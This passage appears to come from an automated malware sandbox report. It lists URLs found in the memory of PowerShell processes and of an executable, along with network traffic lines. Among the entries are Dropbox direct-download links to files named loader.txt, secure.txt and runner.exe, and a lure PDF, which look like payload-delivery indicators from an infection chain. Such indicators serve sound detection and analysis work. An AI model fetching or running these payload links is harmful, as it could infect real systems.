                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc0a94dea147da368ca578e9c165.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc0a94dea147da368ca578e9c165.dl.dropboxusercontent.com/cd/0/get/CgCh17DjAot4f81U6ef-GP-6FG4o
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.com/cd/0/get/CgCEuRRMHdo1n8xDRYr3hdPQBokK
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.com/cd/0/get/CgBI0vZLcfIzC6_GbdoC3zuM4stA
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.com/cd/0/get/CgBJN8EsfGTe3jsM3L3IkAoL9wJS
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D25E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                      Source: powershell.exe, 00000010.00000002.2534975024.00000293D0190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2536989756.00000293D0420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppu
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/ic3qrv251eb3hefiq4cgw/loader.txt?rlkey=dhptqx5w48vzhc81an0mgw37n&dl=1
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/q
                      Source: powershell.exe, 00000010.00000002.2534975024.00000293D0190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2536989756.00000293D0420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/rhdfi34kz96yn76veo4so/secure.txt?rlkey=nx60j5siilxx9ixj2w41y03ec&dl=1
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
                      Source: 1718218388.exe, 0000001B.00000002.2753649067.0000000002550000.00000004.00001000.00020000.00000000.sdmp, 1718218388.exe, 0000001B.00000000.2531449583.000000000053D000.00000002.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001C.00000000.2702223771.000000000053D000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.macromedia.com/bin/flashdownload.cgi
                      Source: 1718218388.exe, 1718218388.exe, 0000001C.00000000.2702223771.000000000053D000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
